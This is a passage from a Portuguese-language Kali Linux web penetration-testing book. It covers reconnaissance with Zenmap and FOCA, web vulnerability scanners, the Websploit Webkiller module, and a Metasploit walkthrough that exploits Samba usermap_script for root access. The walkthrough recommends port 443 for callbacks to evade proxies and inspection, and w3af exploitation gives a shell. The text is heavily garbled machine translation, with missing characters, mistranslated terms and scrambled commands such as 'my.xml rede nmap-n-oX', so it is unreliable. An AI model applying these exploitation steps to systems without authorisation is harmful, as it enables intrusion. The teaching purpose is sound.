descrio da minha posio, a minha rede local alvo de verificao e nome do cliente.
[61]
Reconhecimento
Ao concluir a sua descrio, clique no Digitalizao guia. No Alvos seo,
voc vai adicionar o que os hosts ou redes que voc gostaria de digitalizar. Este campo pode
assumir
uma gama de endereos IP (10.0.1.1-255) ou pode ter uma rede em formato CIDR
(10.0.1.0/24).
Voc pode ver a opo -A selecionada por padro para permitir a digitalizao agressivo. Agressivo
digitalizao permitir a deteco de SO (-O), deteco de verso (-SV), de varredura de script (-SC)
e traceroute (- traceroute). Essencialmente, a digitalizao agressivo permite ao usurio ligar
vrios sinalizadores, sem a necessidade de ter que se lembrar deles.
Varredura agressivo considerado intrusivo, o que significa que ser detectado pela maioria
dispositivos de segurana. Uma varredura agressivo pode passar despercebida se o seu alvo um
extremamente especfico de acolhimento, mas, independentemente da situao, recomendado
que voc
ter a permisso para fazer a varredura antes de usar este ou opo de digitalizao. Como um
lembrete,
completar o ACK no handshake de trs vias com um sistema no autorizado
considerado ilegal pelos padres norte-americanos.
Podemos usar as informaes que recebemos de nosso exerccio Reconnaissance DNS para
visar uma srie muito especfica. Antes de fazer isso, vamos definir algumas opes comuns em
primeiro lugar.
[62]
Captulo 2
Clique no Sibilo guia. Selecione o -Pn opo bandeira to Nmap no ping no host primeiro.
Quando este sinalizador no estiver definido, o Nmap ir pingar seus hosts de destino e redes.
Omisso
definies s executar scans em hosts que so considerados vivos ou acessvel. A-Pn
diz ao Nmap para digitalizar um anfitrio, mesmo sem uma resposta de ping. Embora isto faz
a varredura consideravelmente mais longo, o -Pn flag permite Nmap para evitar um comum
problema de no receber uma resposta de ping, quando os pedidos de ping so bloqueados por
defesas de segurana.
Salve as alteraes feitas clicando no Salvar alteraes boto no canto inferior direito
canto. Uma vez salvo, selecione o Digitalizao boto no lado superior direito da tela
para iniciar a digitalizao. Observe as suas opes e alvo que voc configurou no perfil
editor so listados.
A rede Topologia guia vai lhe dar uma rpida olhada em como a digitalizao no alvo
rede foi concluda, e se voc tivesse que atravessar roteadores. Neste exemplo, voc v
a verificao permaneceu local para a rede.
[63]
Reconhecimento
O Hosts guia vai dar uma lista dos hosts descobertos.
Quando um host selecionada, Zenmap ir exibir uma lista detalhada dos Exrcitos, seu
sistemas operacionais e servios comuns. Na tela seguinte, voc pode
ver um dos nossos anfitries uma combinao DVR via satlite / receptor.
[64]
Captulo 2
Se voc olhar para a janela de digitalizao, voc no s vai ver quais portas esto abertas em
especfico
exrcitos, mas tambm o que as aplicaes esto em execuo nesses hosts. Observe que o Nmap
pode
determinar as coisas, como um servidor est executando o IIS 5.0 como um servidor web atravs da
porta 80. O
Resultados de pesquisa ir produzir o endereo IP do servidor, o sistema operacional do servidor
execuo, bem como as aplicaes web em execuo no host. Testadores de penetrao vai
encontrar esses resultados valiosos quando eles esto procura de exploits contra este host.
.
Agora possvel para que voc possa concentrar seus esforos na meta de correr web
servios ou a porta 80, porque aberto.
Zenmap a melhor maneira para obter uma sada de scans do Nmap. Zenmap oferece uma
rica
interface grfica do usurio que exibe exames que podem ser exportados em diferentes
formatos, como texto ou Microsoft Excel.
[65]
Reconhecimento
Embora haja muitas maneiras de obter sadas de Nmap (por exemplo, os autores
neste livro preferem as tcnicas de linha de comando), inclumos esta tcnica
porque ele constantemente referenciado em muitos padres de penetrao da web e um
forma comum para as pessoas a us-lo.
Alm disso, vrios lugares em GUI para Zenmap permitem ao usurio exportar grficos e
certas partes do relatrio em arquivos CSV ou arquivos de imagem. Essas exportaes so
extremamente
valioso na criao de relatrios.
FOCA - site metadados Reconnaissance
Voc sabia toda vez que voc criar um documento, como um PowerPoint Microsoft
apresentao, documento do Microsoft Word ou PDF, metadados deixado no documento?
[66]
Captulo 2
O que so metadados? Metadados so dados sobre dados. a informao descritiva sobre
um determinado conjunto de dados, objeto ou de recursos, incluindo a forma como ele formatado,
bem como
quando e por quem foram recolhidas. Os metadados podem ser teis para testadores de penetrao,
porque ele contm informaes sobre o sistema em que o arquivo foi criado, tais como:



Nome de usurios logados no sistema
Software que criou o documento
OS do sistema que criou o documento
FOCA uma ferramenta de segurana e auditoria que ir examinar os metadados de domnios.
Voc
pode ter FOCA usar motores de busca para encontrar arquivos em domnios ou usar arquivos
locais.
FOCA construdo em Kali, no entanto, a verso datado. A melhor prtica baixar
a verso mais recente. FOCA tem sido tradicionalmente uma ferramenta do Windows, ea mais
recente
verses podem estar disponvel apenas para Windows.
A ltima verso do FOCA pode ser baixado em: http://www.informatica64.
com.br / DownloadFOCA (Use o Google Translate para ver a pgina em Ingls).
Voc precisar dar o seu endereo de e-mail na parte inferior da tela. Voc ir
receber um e-mail com o link de download. Voc tambm vai receber atualizaes quando FOCA
tem novos lanamentos.
1. A primeira coisa a fazer depois de lanar FOCA criar um novo projeto, como mostrado
nas imagens seguintes:.
[67]
Reconhecimento
Recomendamos manter todos os arquivos do projeto em um nico lugar. Voc
deveria
criar uma nova pasta para cada projeto.
2. Uma vez que o nome do seu projeto e decidir onde voc deseja armazenar o projeto
arquivos, clique no Criar boto, como mostrado na imagem seguinte:
[68]
Captulo 2
3. A prxima coisa a fazer salvar o arquivo de projeto. Uma vez que voc salvou o projeto,
clique em
no Procurar Todos boto para FOCA vai usar motores de busca para procurar por
documentos. Opcionalmente, voc pode usar os documentos locais.
4. Clique com o boto direito do mouse no arquivo e selecione o Baixar opo, como se
mostra na
tela a seguir:
[69]
Reconhecimento
5. Clique com o boto direito do mouse no arquivo e selecione o Extrair Metadados opo, como
se mostra na
tela a seguir:
6. Clique com o boto direito do mouse no arquivo e selecione o Analisar Metadados opo,
como se mostra na
a tela a seguir:
[70]
Captulo 2
Na tela seguinte, voc pode ver duas pessoas abriram neste documento.
Voc tambm pode determinar o Microsoft Office para o Mac e Adobe Photoshop foram
usado para criar este documento, como mostrado na imagem seguinte:
[71]
Reconhecimento
Em muitos casos, os atacantes sero capazes de ver muito mais informaes e reunir
inteligncia sobre um alvo.
FOCA permite ao usurio salvar e ndice de uma cpia de todos os metadados. Alm disso,
cada tipo de arquivo de metadados podem ser salvas e copiado. Isto d um verificador da
penetrao
uma riqueza de informaes. Imagens so normalmente utilizados para dar uma viso geral do
arquivos indexados, juntamente com uma lista de todos os arquivos individuais. Finalmente, foca
permitir uma
Tester Penetrao baixar arquivos individuais que podem ser usados como exemplos.
Resumo
Reconhecimento normalmente o passo mais crtico em um exerccio de Teste de Invaso
e pode ser o mais demorado. Quaisquer aes tomadas contra a meta
personalizado em torno de resultados de reconhecimento anteriormente realizadas. O mais
dados conhecidos sobre um alvo equivale ao menos susceptveis de desencadear alarmes, bem
como
melhor chance de identificar uma maneira de comprometer o alvo. recomendado
olhar para este captulo como um pr-requisito para os captulos restantes deste livro.
Neste captulo, ns nos concentramos em vrias maneiras de coletar informaes sobre um alvo. Ns
apresentou algumas ferramentas gratuitas populares disponveis na Internet, bem como informaes
Reunindo utilitrios disponveis em Kali Linux. Neste ponto, voc deve estar pronto para
avaliar alvos identificados por meio de reconhecimento para possvel explorao.
O prximo captulo vai se concentrar em identificar e explorar vulnerabilidades em web
aplicativos e servidores web.
[72]
Ataques do lado do
servidor
Um servidor, por definio, um sistema de computao dedicada a execuo de servios para os
usurios e
outros computadores em uma rede. Exemplos de faixa de servio a partir de servios pblicos, tais
jogos on-line como a partilha de arquivos confidenciais dentro de uma grande organizao. No
contexto
da arquitetura cliente-servidor, um servidores um programa de computador que est executando
para servir
os pedidos de outros programas, conhecidos como os "clientes". Assim, o servidor executa
alguma tarefa computacional em nome de "clientes". Os clientes ou executados no mesmo
computador ou ligue atravs da rede. Por exemplo, um servidor que hospedar um jogo
para o mundo enquanto os clientes poderiam acessar o jogo remotamente. Existem vrias formas
de prestao de servios aos clientes, tais como um servidor Web Apache HTTP ou limitada a um
Servidor de Aplicativos BEA WebLogic que faz HTTP e mais.
Servidores de rede so normalmente configurados para lidar com a carga de atender grande
volumes de clientes. Isso significa que a adio de processamento, memria adicional e
armazenamento tornando esses ativos valiosos alvos para hackers. Organizaes tipicamente
gerenciar servidores remotamente e no monitorar ativamente a atividade, ou seja, pequenas batidas
em desempenho ou outros indicadores de que est sendo comprometida pode passar despercebida.
comum encontrar usurios mal-intencionados j acessou servidores comprometidos por longos
perodos
de tempo antes de os proprietrios que identificam a vulnerabilidade usada para acessar o sistema.
Este captulo se concentrar na identificao e explorao de vulnerabilidades em web
servidores de aplicativos. Vamos comear com apresentando ferramentas disponveis no Kali
usados
para identificar vulnerabilidades. Em seguida, vamos nos concentrar na explorao de
vulnerabilidades para ganhar
acesso a servidores de aplicativos web. Concluiremos com outros mtodos de acesso
servios de aplicativos web.
Ataques do lado do servidor
A avaliao da vulnerabilidade
Ataques do lado do servidor esto explorando e encontrar vulnerabilidades em servios, portos,
e aplicaes rodando em um servidor. Por exemplo, um servidor web tem vrios ataque
vetores. um servidor com um sistema operacional e executando vrias peas de
software para fornecer funcionalidade web. Ele tem muitas portas TCP abertas. Cada um de
esses vetores poderia colher uma vulnerabilidade que um invasor pode explorar para entrar
o sistema e obter informao valiosa. Muitos protocolos em servidores so tratados
atravs de texto no criptografado legvel.
Vamos dar uma olhada em algumas ferramentas disponveis no Kali para identificar
vulnerabilidades
em servidores.
Webshag
Webshag uma ferramenta multi-threaded, multi-plataforma utilizada para auditar servidores web.
Webshag rene funcionalidades geralmente teis para servidores web, como o porto
digitalizao, digitalizao e arquivo de URL difuso. Ele pode ser usado para fazer a varredura de
um servidor web em
HTTP ou HTTPS, atravs de um proxy e usando a autenticao HTTP (bsica ou Digest).
Alm disso, Webshag pode usar recursos de evaso de IDS que visam tornar correlao
entre os pedidos mais complicado.
Webshag oferece capacidades inovadoras adicionais, tais como recuperar a lista de
nomes de domnio hospedado em uma mquina de destino, bem como de difuso usando
dinamicamente
nomes de arquivos gerados. Webshag pode realizar impresses digitais de pginas da web ao
mesmo tempo que
resistente a alteraes de contedo. Este recurso foi projetado como uma remoo de falsos
positivos
algoritmo destinado a lidar com "soft 404" respostas do servidor.
Webshag acessado atravs de uma interface grfica ou um console de linha de comando e
disponvel com
as plataformas Linux e Windows. Webshag pode ser encontrado em Aplicaes Web
|Scanners de Vulnerabilidade Web como webshag-gui.
Webshag fcil de utilizar. Cada recurso tem uma aba na parte superior. Selecione o recurso
desejado
guia, insira em seu URL de destino sob o espao de destino e clique em Ok para executar. Voc
pode executar vrias abas simultaneamente. As caractersticas incluem Porto de digitalizao,
Aranha, URL
Digitalizar e Fuzzing. Os prximos quatro imagens mostram Webshag realizando uma varredura de
portas,
rastreamento de aranha web, varredura URL e arquivo de Fuzz www.thesecurityblogger.com:
[74]
Captulo 3
[75]
Ataques do lado do servidor
[76]
Captulo 3
Webshag oferece exportar todos os dados encontrados durante uma auditoria no XML, HTML e
Formatos de arquivo TXT. O relatrio final da Webshag organizado em um formato lgico tornando-
se
digno de ser usado como um documento independente ou artigo de referncia para um teste de
penetrao
relatrio de entrega. As duas prximas imagens mostram exportadores opes e ao topo de uma
relatrio de auditoria:
Mais informaes sobre Webshag pode ser encontrada em
http://www.scrt.ch/en/attack/downloads/webshag.
[77]
Ataques do lado do servidor
Skipfish
Skipfish uma ferramenta de reconhecimento de segurana de aplicativos web. Skipfish prepara um
mapa do site interativo para o alvo usando rastreamento recursivo e sondas base de dicionrio.
O mapa resultante fornece sada aps ser escaneado por verificaes de segurana.
Skipfish pode ser encontrado em Aplicaes Web |Scanners de Vulnerabilidade Web como
skipfish. Quando voc abre Skipfish, um Terminal janela pop-up mostrando
comanda o Skipfish. Skipfish pode usar dicionrios internos ou personalizveis para
avaliao de vulnerabilidade.
Note-se que alguns dicionrios no pode ser encontrada em Kali. Voc pode
baixar a ltima verso do Skipfish e padro dicionrios
a partir de https://code.google.com/p/skipfish/.
Os dicionrios disponveis esto localizados no dicionrio arquivo.
Existem vrias opes de comando disponveis em Skipfish. Para executar Skipfish contra um
alvo site usando uma lista de palavras personalizada, insira skipfish, Selecione sua lista de palavras
usando
o -W opo seguida pela localizao da lista de palavras, selecione o diretrio de sada
utilizao -O seguido do local, e, finalmente, o stio alvo.
Skipfish-o (local de sada)-W (localizao da lista de palavras) (site destino)
O exemplo a seguir mostra uma varredura usando uma lista de palavras chamada complete.wl
em
securityblogger.com. Skipfish ir criar uma pasta chamada Skipfishoutput
no ambiente de trabalho. Isto executado usando a palavra-chave skipfish,-O / root / Desktop /
Skipfishoutput para especificar o local para o qual enviar a sada, -W / root /
Desktop / complete.wl para especificar a localizao do dicionrio e http://
www.thesecuirtyblogger.com como o alvo para fazer a varredura contra.
[78]
Captulo 3
Note-se que o padro skipfish dicionrios no ser executado quando se utiliza o
-W comando. Voc pode copiar uma lista de palavras padro e remover o read-only
na primeira linha da lista (# ro) para ser executado como uma lista de palavras personalizada.
Isto mostrado
na imagem seguinte:
Se no houver erros de compilao, voc ser presenteado com uma tela de lanamento que
estados a digitalizao comear em 60 segundos ou ao pressionar qualquer tecla.
[79]
Ataques do lado do servidor
Voc pode pressionar a Barra de espao para ver os detalhes sobre a pesquisa ou ver os nmeros
padro
executar. Digitalizar um alvo pode levar de 30 segundos a algumas horas para completar
o processo. Voc pode terminar uma varredura cedo digitando Ctrl +C.
Uma vez que a verificao for concluda ou se voc termin-la cedo, Skipfish ir gerar uma tonelada
de sada
arquivos no local especificado quando se utiliza o -O opo de designar uma pasta de sada.
Para ver os resultados, clique no index.html arquivo, o que far com que uma Internet
navegador. Voc pode clicar nas caixas drop-down para ver os resultados. Veja o
exemplo relata seo para obter mais informaes.
[80]
Captulo 3
ProxyStrike um proxy de aplicao web construda para identificar as vulnerabilidades enquanto
navega
um aplicativo. Ele funciona como um proxy na porta de escuta 8008 por padro, o que significa que
tem que configurar o seu navegador de Internet para ser executado atravs ProxyStrike para que ele
possa
analisar todos os parmetros em segundo plano enquanto o surfe site do alvo.
As caractersticas de proxy so timos para identificar, interceptar e modificar pedidos.
Para configurar um navegador de Internet, como o Firefox para usar ProxyStrike, selecione em FireFox
Preferncias |Avanado |Rede e selecione Configuraes. Selecionar Proxy manual e
digite o endereo IP do seu servidor de Kali seguido pelo porto de 8008 (A menos que voc est
pensando
para alterar a porta padro ProxyStrike).
ProxyStrike
[81]
Ataques do lado do servidor
Para usar ProxyStrike, acesse Aplicaes Web |Scanners de Vulnerabilidade Web e
selecionar ProxyStrike. Assumindo que o seu navegador de Internet est enviando trfego para
ProxyStrike,
voc deve ver o trfego capturado no Comms guia. Vamos passar mais tempo usando
Proxies em Captulo 6, ataques web.
As caractersticas de esteira so uma maneira fcil de digitalizar um site alvo para SQL ou SSL e
Vulnerabilidades XSS do plugin. Voc no tem que ter ProxyStrike configurado como um proxy para
usar os recursos de esteira. Para executar a funo de rastreador em um site com plugins XSS,
clique no Plugins guia, v at as velas de XSS e selecione para ativar os plugins
usando a caixa de seleo. Em seguida, selecione a guia rastreador. Entre no site da meta, incluindo
http://, Verifique o rastreamento usando a caixa de plugins e clique no grande Pare boto
mud-lo para Em execuo. Adicionando os plugins ir aumentar o tempo para completar uma
digitalizar. ProxyStrike exibir uma barra de status fornecendo uma estimativa de quanto tempo uma
varredura
deve tomar.
[82]
Captulo 3
[83]
Ataques do lado do servidor
O Plugins guia mostra os resultados de um rastreamento aps uma varredura lanado.
Ataques
identificados podem ser exportados via HTML ou XML.
O Log guia mostra quais as tarefas que esto sendo executadas em site de destino eo nvel
de sucesso para cada ataque. Este arquivo pode ser copiado para um arquivo de texto para um
produto final.
O Crawler guia lista todos os links da web nicos identificados associados a um alvo.
ProxyStrike oferece outros recursos teis. Mais sobre ProxyStrike pode ser encontrada em
http://www.edge-security.com/proxystrike.php.
[84]
Captulo 3
Vega
Vega uma ferramenta de teste de segurana utilizado para indexar um site e analisar o contedo
da pgina para
encontrar as ligaes, bem como parmetros de formulrio.
Para iniciar Vega, ir para Aplicaes Web |Scanners de Vulnerabilidade Web e selecione
Vega. Vega vai piscar um banner de introduo e exibir uma GUI.
[85]
Ataques do lado do servidor
Vega tem Scanner e Procurao guias no canto superior direito. Para usar Vega como um scanner,
clique no Scanner aba no canto superior direito, clique em Digitalizao no canto superior esquerdo,
e selecione para comear a nova verificao.
Voc ver um campo de entrada pedindo o alvo. O exemplo a seguir alvo
www.thesecurityblogger.com. Escolha o seu destino e clique em Em seguida:
As prximas sees so opes que voc pode avaliar o seu alvo contra. Existem dois principais
mdulos (injeo e Processamento Response) com muitas opes para fazer a varredura contra.
Clique na pequena cenoura em cada mdulo, selecione as opes que voc deseja procurar,
e clique em Avanar.
[86]
Captulo 3
As duas imagens seguintes oferecer a possibilidade de adicionar os cookies e os padres de
excluso
para evitar a difuso, que so ambos opcional. Voc pode deixar os padres e clique em
Prximo para ambas as telas. Clique em Acabamento para iniciar a digitalizao.
Vega vai exibir as pesquisar e mapear as vulnerabilidades ativos encontrados para o nvel de risco
que representam para o sistema de destino.
A janela superior esquerda intitulado Ver Website exibe o alvo (s) que est sendo digitalizado
e outros alvos associados com o alvo principal. A parte inferior da janela esquerda
intitulado Digitalizar Alertas mostra as categorias de vulnerabilidades encontradas. Voc pode
clicar
sobre os acentos circunflexos ao lado dos alertas para ver o que vulnerabilidades Vega encontra.
Quando voc
clicar em qualquer vulnerabilidade, Vega apresenta uma definio do que encontrado com um
explicao detalhada de seu possvel impacto.
[87]
Ataques do lado do servidor
A figura a seguir mostra uma possvel vulnerabilidade de script cross-site em
www.thesecurityblogger.com:
Vega do Procurao seo fornece a capacidade de ver os pedidos e respostas
um site de destino. O Procurao seo ser preenchida como ocorre uma varredura.
[88]
Captulo 3
Vega oferece detalhes sobre vulnerabilidades encontradas no visor central, bem
como uma pgina de resumo. Esses detalhes podem ser copiados para um resultado final.
OWASP-Zap
OWASP-Zap tambm conhecido como Zaproxy um proxy interceptar projetado para a segurana
testes de aplicaes web.
Abrir Zaproxy, indo para Aplicaes Web |Aplicaes Web fuzzers e
selecionando owasp-zap. Haver um aviso pop-up que deve ser aceito para comear
o programa.
Ao aceitar o aviso de licena, OWASP-Zap vai abrir e exibir outro pop-
perguntando se voc gostaria de criar um certificado SSL da CA raiz. Isto permite Zaproxy
para interceptar o trfego HTTPS sobre SSL em um navegador. Isto importante para aplicaes de
teste
que usam HTTPS. Para gerar um certificado SSL, clique no Gerar boto.
[89]
Ataques do lado do servidor
Haver uma janela que aparece pedindo para gerar ou importar um certificado. Voc
pode gerar um certificado clicando em Gerar. Voc pode salvar o novo certificado
clicando no Salvar e selecionar onde voc deseja coloc-lo. O novo arquivo de certificado
chamado owasp_cap_root_ca.cer.
Uma vez que voc salvou o arquivo de CA, clique em Ok e abrir o seu navegador. Para o Firefox,
falir Editar |Preferncias e clique no Avanar guia. Clique no Criptografia
sub-aba e clique em Exibir certificados. Em seguida clique em Importao e selecione o certificado
voc gerada em Zaproxy (o . Cer arquivo). Firefox ir perguntar em quem confiar com o
novo Autoridade de Certificao. Confira todas as trs opes, que so sites de confiana, e-mail
desenvolvedores de usurios, e software. Clique em Ok duas vezes.
[90]
Captulo 3
O prximo passo configurar o Firefox para procurao todo o trfego atravs Zaproxy. Faa isso
, indo para Editar, Preferncias, selecionar o Avanado guia e, em seguida, selecionando o
Rede guia. Clique no Configurar boto, clique em Configurao manual de proxy,
tipo localhost e porta 8080, Que o padro para Zaproxy. Clique no
caixa ao lado Use este servidor proxy para todos os protocolos e clique em OK. O
tela a seguir demonstra essa configurao:
Abra Zaproxy e voc deve ver uma Sites janela no lado superior esquerdo. Esta vontade
preencher como voc navegar na Internet usando o Firefox. Voc pode ver todos os pedidos e
respostas para cada pgina na janela da direita. Zaproxy d uma viso fcil de todos
os recursos que esto sendo utilizados por cada pgina.
[91]
Ataques do lado do servidor
Voc tambm pode fazer uma avaliao especfica de um site, indo para o incio rpido
janela e digitando em um site na URL para atacar espao. A sequncia
Screenshot Zaproxy executar uma verificao de www.thesecurityblogger.com:
Zaproxy ir realizar um rastreamento de aranha do site da meta identificar todas as
links associados com o alvo, bem como varredura em busca de vulnerabilidades. Para ver o
vulnerabilidades, clique no Alertas guia.
Note-se que Zaproxy no automatizar a autenticao por padro. Tudo o login
solicitaes falhar usando uma varredura automtica se as configuraes padro esto
habilitados.
[92]
Captulo 3
Voc pode configurar o login automtico usando Zaproxy, no entanto, voc ter que primeiro
registrar manualmente em um site enquanto Zaproxy est habilitado, diga Zaproxy onde o
login e logoff so pedidos e habilitar o recurso de auto-login. O GET solicitaes
ser exibido na Sites janela e voc deve destacar tanto o login e de logout
respostas sob a Respostas guia clicando com o boto direito sobre a resposta, ao clicar em
Assinalar como contedo e selecionar se a de login ou logout.
Um cone com uma linha marrom aparecer na barra de ferramentas representando automtico
autenticao. Clique sobre esse cone para ativar a autenticao automtica de modo que
Zaproxy pode logar automaticamente em qualquer pedido de autenticao ao fazer uma
avaliao automtica de um alvo. Este recurso til para auto-explorar um site
que requer autenticao.
[93]
Ataques do lado do servidor
Zaproxy tem um lugar de mercado encontrado em Ajudar |Verificar atualizaes que oferece outra
caractersticas, que podem ser adicionados ao arsenal Zaproxy.
Zaproxy oferece diferentes opes de relatrios encontrados sob a Relatrio guia.
Aqui esto exemplos de um relatrio HTML para www.thesecurityblogger.com.
[94]
Captulo 3
Websploit
Websploit um projeto de cdigo aberto usado para digitalizar e analisar sistemas remotos
encontrar vulnerabilidades.
Para acessar Websploit, ir ao abrigo Aplicaes Web |Aplicaes Web fuzzers e
selecionar websploit. ATerminal janela pop-up com o Websploit bandeira. Voc
pode ver todos os mdulos disponveis eo que necessrio para executar um mdulo especfico por
datilografia Mostrar mdulos.
Tipo USO seguido do mdulo que voc deseja e preencha os requisitos para executar.
Por exemplo, para executar o Webkiller mdulo, tipo usar a rede / Webkiller e encher
no alvo para atacar o uso set TARGET comandos. Tipo RUN para executar o mdulo.
[95]
Ataques do lado do servidor
Explorao
Se um verificador da penetrao investe tempo e recursos adequada durante o
Reconhecimento de um alvo, o verificador da penetrao deve acabar com uma lista de alvos
com possveis vulnerabilidades. O prximo passo priorizar o valor de cada alvo para o seu
misso, aproximando o nvel de esforo necessrio para explorar possveis vulnerabilidades,
e julgar o risco associado com a realizao do ataque. A vulnerabilidade e
explorao disponvel em Kali so ideais para a identificao e explorao de vulnerabilidades
encontrados durante o reconhecimento de servidores de aplicativos web.
Metasploit
O Metasploit quadro uma das ferramentas mais populares para a explorao do lado do servidor
ataques. considerada uma das ferramentas mais teis para testadores de penetrao. HD Moore
criado em 2003. Ele usado como uma ferramenta de teste de penetrao legtimo, bem como uma
ferramenta
utilizado por atacantes para realizar a explorao no autorizada de sistemas.
H uma abundncia de fontes dedicado a ensinar como usar o Metasploit
quadro. No contexto deste livro, vamos examinar como Metasploit usado
para a explorao do lado do servidor para testar aplicaes web em potencial.
Nota para certificar-se de Postgres SQL e servios Metasploit so iniciados.
Voc pode faz-lo digitando postgres servio comear e servio
incio Metasploit no Terminal janela como root.
O primeiro passo abrir um console e digitar msfconsole para lanar Metsaploit.
msfconsole a forma mais popular para lanar Metasploit. Ele fornece um usurio
interface para acessar o quadro Metasploit inteiro. Comandos bsicos, como
ajudar e exposio permitir que voc navegue atravs Metasploit.
Note-se que existem outros mtodos para lanar Metasploit como
msfgui (Baseado em GUI) e msfcli (Linha base de comando).
Em adio aos comandos Metasploit, msfconsole permitir que voc invocar
comandos do sistema operacional subjacente, como sibilo ou nmap. Isso til porque
permite a um invasor executar tarefas rotineiras sem sair do console.
Em nosso primeiro passo, vamos usar nmap para fazer a varredura da rede local. Os
resultados podem
ser automaticamente adicionado no Metasploit usando um arquivo XML.
[96]
Captulo 3
O comando que emitimos :
my.xml rede nmap-n-oX
Vamos importar os nossos resultados de nmap em Metasploit usando o arquivo XML que criamos.
Fazemos isso atravs do comando:
db_import my.xml
Uma verificao rpida dos comandos do host mostra que a nossa importao bem
sucedida e
Metasploit tem agora a nmap dados.
Ns tambm ir emitir o servios comando para ver os servios disponveis dentro
Metasploit. O seguinte um exemplo de sada do servio comando:
[97]
Ataques do lado do servidor
Voc pode realizar a digitalizao para nmap e importar o arquivo XML para o Metasploit
banco de dados em uma nica etapa usando o comando db_nmap. No exemplo a seguir, ns
est usando db_nmap para digitalizar um host usando o nmap comandos.
Podemos verificar que Metasploit tem a informao relevante na sua emisso de banco de dados
o hospedeiros e servios comandos.
O servios comando revela que estamos usando o compartilhamento de arquivos Samba. Vamos ver
se podemos
procurar um exploit e tirar proveito disso. importante notar que, embora
estamos atacando um servidor web real, neste caso, no precisa necessariamente tentar
para explorar uma vulnerabilidade web. Atacantes reais vai aproveitar todo o software
rodando em um servidor web para acessar informaes.
Vemos vrios exploits Samba disponvel. Eles tambm tm rankings. Usaremos
o usermap_script explorar com uma excelente classificao. Este mdulo explora o
vulnerabilidade de execuo de comando em verses de Samba 3.0.20 atravs 3.0.25rc3.
Mais informaes sobre este exploit pode ser encontrada em http://www.metasploit.com/
modules / exploit / multi / samba / usermap_script.
[98]
Captulo 3
Para usar um especfico explorar, emitimos o usar comando. Neste caso:
Uma vez que um exploit selecionado, preciso ver que informao necessria antes de
podemos executar o selecionado explorar. Fazemos isso atravs da identificao do requerido
opes listadas na sada e selecionar uma carga til que queremos entregar. Ns
emitir o comando mostrar opes para ver as opes necessrias:
[99]
Ataques do lado do servidor
Podemos ver esse exemplo que precisamos de uma RHOST entrada. RHOST o endereo IP
do host remoto que esto atacando. Ns tambm precisamos selecionar a carga e definir o
opes de carga til. A carga til o cdigo que injeta em si e executa o exploit. Desde
a mesma vulnerabilidade pode existir usando vrios mtodos, podemos eventualmente ter
vrias cargas teis para escolher. Para ver as cargas disponveis, emita o exposio
payloads comando.
Uma vez que vemos uma carga que queremos usar, o prximo passo usar a definir payload
comando e colocar no nome do patch da carga que vemos.
[100]
Captulo 3
Uma vez que a carga definido, podemos emitir o mostrar opes comando novamente para verificar a
opes especficas para a carga til.
Podemos ver isso de carga especfico est nos pedindo para definir o LHOST e a LPORT. O
LHOST o host local ou sua caixa atacante Metasploit. A explorao faz o controle remoto
sediar ligar de volta para o sistema de hospedagem Metasploit, por isso o host remoto precisa
sabe o que o seu endereo de IP .
Alm disso, preciso definir a porta do host remoto ir usar para se comunicar com
Metasploit. Muitos ambientes corporativos restringir portas de sada atravs de um firewall
ou roteador. A melhor prtica usar uma porta comum, como porta 443, Uma vez que geralmente
reservados para o trfego SSL, que a maioria das empresas permitem sada. Alm disso, outra
benefcio do uso de porta 443 que a maioria das organizaes no inspecionar SSL. Ns achamos
que
utilizao 443 como LPORT para a maioria dos ataques nos permite ignorar ferramentas de proxy
interno um
organizao pode ter implantado.
[101]
Ataques do lado do servidor
Quando terminar de configurar as nossas opes, podemos escrever, explorar para executar o ataque.
Quando
o exploit executado com xito, voc ser conectado ao servidor remoto. Voc pode
executar qualquer comando e, neste exemplo, neste particular explorar d acesso root. Raiz
acesso significa acesso completo ao seu servidor remoto alvo.
Existem vrios exploram e carga opes disponveis no quadro Metasploit.
Certifique-se de rever as opes disponveis no http://www.metasploit.com/.
w3af
w3af (Abreviao de Aplicaes Web Attack e Quadro de Auditoria) um open-source
scanner de segurana de aplicaes web e ferramenta de explorao. W3af pode ser acessado em
Avaliao de Aplicaes Web |Scanners de Vulnerabilidade Web seleccionando w3af.
[102]
Captulo 3
w3af oferece um assistente, no entanto, no necessrio para executar corretamente uma varredura.
O primeiro
passo ou est a criar um novo perfil ou aproveitando um perfil existente. Os perfis so utilizados
para plugins de grupo que ser executado em um alvo. w3af vem com algum grande defeito
grupos como OWASP TOP10. Definies de plugins existentes sero exibidas em
A janela Centro de como voc selecion-los, como o exemplo a seguir do OWASP
Perfil TOP10. Voc pode selecionar um perfil existente ou o novo perfil que voc acabou de
criado na coluna da esquerda. Se voc estiver usando um novo perfil ou editar um j existente
perfil, voc pode marcar a caixa para qualquer plugins que deseja verificar. Quanto mais plugins
voc verificar, quanto mais tempo a digitalizao vai demorar. w3af ir avis-lo de possveis atrasos
se voc verificar um grande grupo. Clique em Comeo para executar a verificao.
Em seguida, digite a URL de destino no Target: campo e clique em Comeo para executar a
verificao. O
seguinte imagem mostra criao de w3af para escanear www.thesecurityblogger.com:
[103]
Ataques do lado do servidor
w3af mostrar o status de uma varredura ativa no Log janela. w3af tentar
predizer o perodo de tempo necessrio para completar a anlise.
Para ver os resultados de uma varredura, clique no Resultados guia. Resultados proporcionar o
foram identificados os detalhes do que possvel vulnerabilidades. O Explorar guia vai mostrar
as possveis exploits baseados nas vulnerabilidades descobertas.
[104]
Captulo 3
w3af permite aos usurios explorar vulnerabilidades identificadas durante a fase de auditoria. Como
vulnerabilidades so encontrados, eles so armazenados em locais especficos da base de
conhecimento,
a partir da qual explorar plugins podem ler e usar essa informao para explorar o
vulnerabilidade. Se a explorao for bem sucedido, voc vai ter um shell no sistema de destino. O
imagem seguinte mostra www.ntew3af explorando a dayShell vulnerabilidade em
www.thesecurityblogger.com.
H um monte mais recursos teis no conjunto de ferramentas w3af. Voc pode aprender mais
em
http://w3af.org/.
Explorando os sistemas de e-mail
Por natureza, todos os sistemas de e-mail sentar na Internet e permitem externo annimo
acesso do mundo exterior, a fim de ser produtivo. Usurios em muitas organizaes
enviar informaes confidenciais por e-mail. Na maioria dos ambientes, os servidores de e-mail
manter
informaes valiosas tornando-se um alvo de alta prioridade para os atacantes. A boa
notcia para os consumidores que os sistemas de e-mail configuradas corretamente modernos so
extremamente
difcil de explorar. Isso no significa que os sistemas de e-mail no so vulnerveis a ataques
pois a maioria dos sistemas de e-mail tm aplicaes web e so acessadas atravs de um web
interface. Isto promove a possibilidade de um intruso acesso remoto a um ncleo
sistema que poderia ser aproveitado como um ponto a outros sistemas internos.
[105]
Ataques do lado do servidor
Antes de atingir os servidores de correio, importante saber o que os sistemas esto hospedando o
